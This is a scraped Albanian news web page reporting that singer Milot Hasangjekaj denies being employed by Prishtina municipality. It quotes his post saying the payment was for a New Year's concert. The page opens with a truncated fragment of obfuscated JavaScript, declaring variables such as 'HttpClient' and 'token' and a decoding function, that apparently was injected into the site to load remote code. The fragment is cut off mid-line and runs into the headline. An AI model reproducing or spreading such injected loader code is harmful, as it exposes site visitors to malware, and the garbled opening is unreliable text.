;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mediat e ‘punësuan’ në Komunë, reagon Milot Hasangjekaj

By

Që prej mëngjesit, nëpër portale po qarkullon një listë me emra të gjoja të punësuarëve me kontratë mbi vepër në komunën e Prishtinës.

Në mesin e emrave, të përsëritur disa herë, ajo që befasoi ishte prania e disa prej këngëtarëve si Milot Hasangjekaj nga grupi Etnon, Xuxit apo Edona Reshitaj.

Pasi që u sqarua nga vetë i pari i Prishtinës, Shpend Ahmeti se bëhet fjalë për pagesa, respektivisht pjesëmarrjen në koncertin e natës së ndërrimit të motmoteve, ka reaguar edhe vetë Miloti shkruan Prive.al.

Ai ka mohuar kategorikisht të qenurit pjesë e stafit të punësuar në Komunë teksa ka kritikuar mediat që bënë këtë ‘zbulim’.

Ky është postimi i plotë i tij:

Gazetari hulumtuese e deshtuar!!!

Te dashur shoke e shoqe un nuk jam i punesuar ne Komunen e Prishtines.

Deri sa njerzt te kuptojne cka eshte realiteti pjesa tjeter vetem e kane fiksuar ne mendje nje lajm te pa konfirmuar si nje te vertete. !?!?
Portalet (mediat elektronike) nuk e kane idene sa jo profesionale dhe te demshme munden me qene nese postojne lajme te pa konfirmuara!

Ne listen e botuar nga mediat ne lidhje me punesimin e 250 njerezve miltante te Vetevendosjes nga komuna e Prishtines dhe kryetari i saj Shpend Ahmeti, figuron edhe emri Milot Hasangjekaj.

Sa per korrektesi me duhet te sqaroj kete gje :

Ne (Etnon) kemi qene te angazhuar nga Komuna e Prishtines per performance ( koncert ) sic ben dhe ka bere komuna rregullisht per gjithe keto vite. Dhe une si antar i grupit kam nenshkruar dokumentet e nevojshme te pageses dhe kjo eshte arsyeja pse figuron emri im aty. Nuk ka kurrefare punesimi apo angazhimi politik dhe nuk eshte aspak e drejte te akuzohet komuna dhe kryetari i saj per kete gje, deri sa po shoh shume emra kengetaresh, dj e njerz tjere te artit e muzikes ne kete liste ku ata jane paguar vetem per sherbimin e bere per ate kohe!

Ju Faleminderit per mirekuptim!

Artikuj të ngjashëm